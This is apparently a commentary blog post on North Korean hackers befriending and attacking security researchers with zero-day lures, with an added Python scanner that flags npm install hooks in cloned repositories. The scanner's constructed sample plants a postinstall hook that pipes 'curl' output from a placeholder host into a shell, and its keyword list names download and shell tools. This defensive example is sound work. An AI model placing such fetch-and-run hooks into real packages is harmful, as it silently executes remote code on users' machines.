DailyPost 2542

Cyber security researchers becoming targets themselves should be an eye-opener for a world that keeps patting itself on the back, as if a few bland laws and ineffective investigations would change anything. We live in a cyber-ripped world where ignorance has, for the first time, become real bliss. A recent report describes how North Korean hackers have exploited a zero-day bug to target cyber security researchers. They continue to target the cyber security community “using a zero-day bug in an unspecified software over past several weeks to infiltrate their machines.”

The findings carry weight because they come from Google’s Threat Analysis Group (TAG), which found the attackers’ fake accounts on social media platforms such as X and Mastodon. The accounts were used to forge relationships and build trust with potential targets. In one case the attackers carried on a months-long conversation with a security researcher on topics of mutual interest. Initial contact was made on X, after which the conversation moved to encrypted messaging apps. This patient social engineering exercise ultimately paved the way for the real task: delivering a malicious file containing at least one zero-day exploit for a popular software package.

What does the payload do? It performs a number of anti-virtual-machine checks, then transmits the information it collects, along with a screenshot, to an attacker-controlled server. The account in question had been active since at least October 2022. The threat actor even went to the extent of releasing proof-of-concept (PoC) “exploit code for high-severity privilege escalation flaws in the Windows Kernel.” Unsurprisingly, this is not the first time North Korean hackers have “leveraged collaboration-themed lures to infect victims.” In July 2023, GitHub disclosed details of a similar npm campaign, in which the threat actor invited the target to collaborate on a GitHub repository and convinced the “target to clone and execute its contents.”
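The npm campaign above relies on the victim cloning a repository and running it, and the simplest way such a repository executes code is through npm lifecycle scripts that run automatically during `npm install`. The following is an added example, not code from the original post, from Google TAG or from GitHub’s disclosure: a small check a researcher can run over a freshly cloned tree before installing anything. It walks the checkout, reads every package.json it finds, and reports hooks that run without being invoked explicitly, flagging commands that reach out to the network or spawn a shell. The hook names, token list and sample package.json contents are assumptions made for the example; the sample repository it builds is constructed, not real.

```python
"""Flag npm lifecycle hooks in a cloned repository before running `npm install`.

Added example for this post; not the attackers' tooling nor GitHub's or Google TAG's code.
The sample repository built by build_sample_repo() is constructed for illustration.
"""
import json
import os
import tempfile

# Hooks npm runs on its own during `npm install` (assumed list for this example;
# `prepare` fires on a bare `npm install` inside a checkout, `prepublish` is legacy).
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Substrings in a script body that deserve a second look before trusting it.
SUSPICIOUS_TOKENS = ("curl", "wget", "powershell", "node -e", "bash -c", "sh -c", "base64", "eval")


def inspect_package_json(path):
    """Return a list of (hook, command, flags) for every auto-run hook in one package.json."""
    with open(path, "r", encoding="utf-8") as fh:
        try:
            data = json.load(fh)
        except json.JSONDecodeError:
            # A deliberately broken manifest is itself worth reporting.
            return [("<unparseable>", "", ["invalid json"])]
    scripts = data.get("scripts") or {}
    findings = []
    for hook in AUTO_RUN_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        flags = [tok for tok in SUSPICIOUS_TOKENS if tok in cmd.lower()]
        findings.append((hook, cmd, flags))
    return findings


def scan_repo(root):
    """Walk a checkout (skipping node_modules and .git) and collect auto-run hooks per package.json.

    Keys are repository-relative paths with forward slashes so results compare the same on any OS.
    """
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in ("node_modules", ".git")]
        if "package.json" in filenames:
            full = os.path.join(dirpath, "package.json")
            findings = inspect_package_json(full)
            if findings:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                report[rel] = findings
    return report


def build_sample_repo():
    """Constructed sample checkout: a benign top-level package plus a nested package
    whose postinstall hook downloads and pipes a script into a shell."""
    root = tempfile.mkdtemp(prefix="npm-scan-")
    os.makedirs(os.path.join(root, "packages", "helper"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "demo", "scripts": {"test": "jest"}}, fh)
    nested = os.path.join(root, "packages", "helper", "package.json")
    with open(nested, "w", encoding="utf-8") as fh:
        json.dump({"name": "helper",
                   "scripts": {"postinstall":
                               "node -e \"require('child_process').exec('curl -s http://example.invalid/x | sh')\""}},
                  fh)
    return root


if __name__ == "__main__":
    repo = build_sample_repo()
    for rel, findings in scan_repo(repo).items():
        for hook, cmd, flags in findings:
            print(f"{rel}: {hook} -> {cmd!r} flags={flags}")
```

This only inspects manifests inside the clone itself; the dependencies that `npm install` pulls in have their own lifecycle scripts, which is why a cautious first install of an untrusted repository is better done with `npm install --ignore-scripts` and, ideally, inside a disposable virtual machine rather than on the analyst’s own workstation.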

Google TAG also found a tool named “GetSymbol”, developed by the attackers and hosted on GitHub as a potential secondary infection vector; it had been forked 23 times. For the North Korean hackers this is not all: they have become participants in war. The actor named in this report is the North Korean nation-state actor known as ScarCruft. This hacking outfit “is leveraging LNK file lures in phishing emails to deliver a backdoor capable of harvesting sensitive data and executing malicious instructions.” To believe that none of this is happening in India, merely because there is no focused research in this area, is like living in wonderland.

Sanjay Sahay

Have a nice evening.
